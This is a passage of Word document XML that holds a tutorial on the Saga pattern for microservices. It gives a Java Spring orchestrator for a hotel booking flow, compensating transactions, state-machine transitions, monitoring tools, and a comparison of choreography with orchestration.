        </w:rPr>
        <w:t>central orchestrator</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> coordinates the entire transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC1189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re structured and easier to manage than Choreography.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DA7A94"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Example Scenario: Hotel Booking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689D727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ervices:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Booking Service, Payment Service, Room Allocation Service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3DB60A"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Step-by-Step Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097DAA47" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">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1: Add Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>Similar to the Choreography pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FA170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2: Define Orchestrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952019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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14EC5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ublic class BookingOrchestrator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBB3BF0" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF755D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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A498B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RestTemplate restTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40841B5F" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="271AD26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ublic String startBooking(String userId, String roomType) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B06401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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D56C3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tring bookingId = initiateBooking(userId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA4C31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ocessPayment(userId, bookingId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADBEAD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allocateRoom(bookingId, roomType);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CC42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Booking completed";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140CA6F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tch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446DDE3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cancelBooking(userId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F3EE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Booking failed: " + e.getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0525A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7281D0A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792D9856" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="653A122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private String initiateBooking(String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD7463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Booking Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00ACD8D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turn restTemplate.postForObject("http://booking-service/start", userId, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020665B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4A7952F5" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B7063C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processPayment(String userId, String bookingId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B14BB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Payment Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B2BE0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payment-service/pay", bookingId, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39316A9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37D1E37D" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A110FB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allocateRoom(String bookingId, String roomType) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B93FEF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Room Allocation Microservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A9721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room-service/allocate", bookingId, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8AE22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0D13C1ED" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A0351F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private void cancelBooking(String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6BC19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ll Cancel Booking API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEF011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booking-service/cancel", userId, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080AC38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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFBCD8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1A08E327" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00F30CA9">
      <w:pPr>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tep 3: Handling Compensation</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>If any step fails, invoke compensation logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FF159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ancel Payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC84E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eallocate Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B317C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ancel Booking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A3742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Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AAB2C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entralized control and monitoring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A98B317"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sier to manage compensations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B416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hallenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AA357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ingle point of failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D2C11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Orchestrator becomes a bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37478B65"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DECA18">
          <v:rect id="_x0000_i2904" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBB5FF5"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Transaction States in Saga:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055D11A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Pending:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Transaction started.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7BBAE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Success:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Successfully completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBD9A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Failed:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Failed and compensation needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E248F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ompensated:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compensation executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B150457"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Implementing Compensating Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50545FB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For failed bookings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7B3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private void cancelBooking(String userId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EBDF5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System.out.println("Compensating transaction for user: " + userId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E4772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restTemplate.postForObject("http://booking-service/cancel", userId, String.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BB1B5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29156141"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FBCBA4">
          <v:rect id="_x0000_i2905" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3440C35F"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Using State Machine for Saga Orchestration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3393D54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You can also use </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring State Machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manage state transitions more explicitly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496AB0E1"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tates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1093A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INITIATED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFC9D4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PAYMENT_PENDING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A3DB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ROOM_ALLOCATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248EE45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OMPLETED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DB647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CANCELED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9977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transitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24D4E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INITIATED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09450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PAYMENT_PENDING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA977C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PROCESS_PAYMENT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2264F88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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - from: PAYMENT_PENDING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169EB70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ROOM_ALLOCATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E01734"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ALLOCATE_ROOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE6FE4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ROOM_ALLOCATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B6DD0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COMPLETED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264B89DA"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COMPLETE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF43E5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 from: ANY_STATE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708A11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to: CANCELED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3119CBF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    event: CANCEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B3D625"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Monitoring Sagas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B217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entralized Logging:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aggregate logs from all microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B055EE"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Tracing with Sleuth/Zipkin:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Track transaction flows across services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDD7B0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Metrics with Prometheus/Grafana:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Monitor system health.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5A724"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03303">
          <v:rect id="_x0000_i2906" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA9E3A0"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Which Pattern to Cho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2827"/>
        <w:gridCol w:w="1948"/>
      </w:tblGrid>
      <w:tr w:rsidR="00442AC3" w:rsidRPr="00442AC3" w14:paraId="2143298F" w14:textId="77777777" w:rsidTr="00442AC3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F8E38E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riterion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E29F691"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horeography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5AE51428"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Orchestration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442AC3" w:rsidRPr="00442AC3" w14:paraId="7A7CC232" w14:textId="77777777" w:rsidTr="00442AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="289E236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oordination Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55C1C33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w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="056B252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igh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442AC3" w:rsidRPr="00442AC3" w14:paraId="73A1945E" w14:textId="77777777" w:rsidTr="00442AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F32FC7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Failure Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="020D18D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ard to track</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B7F7468"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entralized control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442AC3" w:rsidRPr="00442AC3" w14:paraId="5A15CE7C" w14:textId="77777777" w:rsidTr="00442AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18C5E22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ervice Coupling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A8172F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Loose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5325540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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442AC3" w:rsidRPr="00442AC3" w14:paraId="0E418BB0" w14:textId="77777777" w:rsidTr="00442AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="119F567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Debugging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C60BBF"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Complex due to event chaining</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50BD6E6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Easy via orchestrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00442AC3" w:rsidRPr="00442AC3" w14:paraId="26269DF5" w14:textId="77777777" w:rsidTr="00442AC3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="039894B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Scalability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F8EDA2D"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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="765496B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derate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="328691C0"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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92531B"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Idempotency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure each step is idempotent to avoid inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B2346"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Compensation Logic:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Clearly define compensation actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D5270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Event Sourcing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Keep a record of each step in the saga.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2345D410"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tools like Prometheus and Grafana to observe saga states.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E531F8" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00000000" w:rsidP="00442AC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71CB2A">
          <v:rect id="_x0000_i2907" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBACDDD" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687857CC"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Choreography</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when services are loosely coupled and independent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCD1602"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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Orchestration</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you need a central controller and structured workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D22FF5"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 xml:space="preserve">Implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle retries gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B868CC3"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Monitor saga states and transitions for better observability and debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D30EF9" w14:textId="77777777" w:rsidR="00442AC3" w:rsidRPr="00442AC3" w:rsidRDefault="00442AC3" w:rsidP="00442AC3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442AC3">
        <w:rPr>
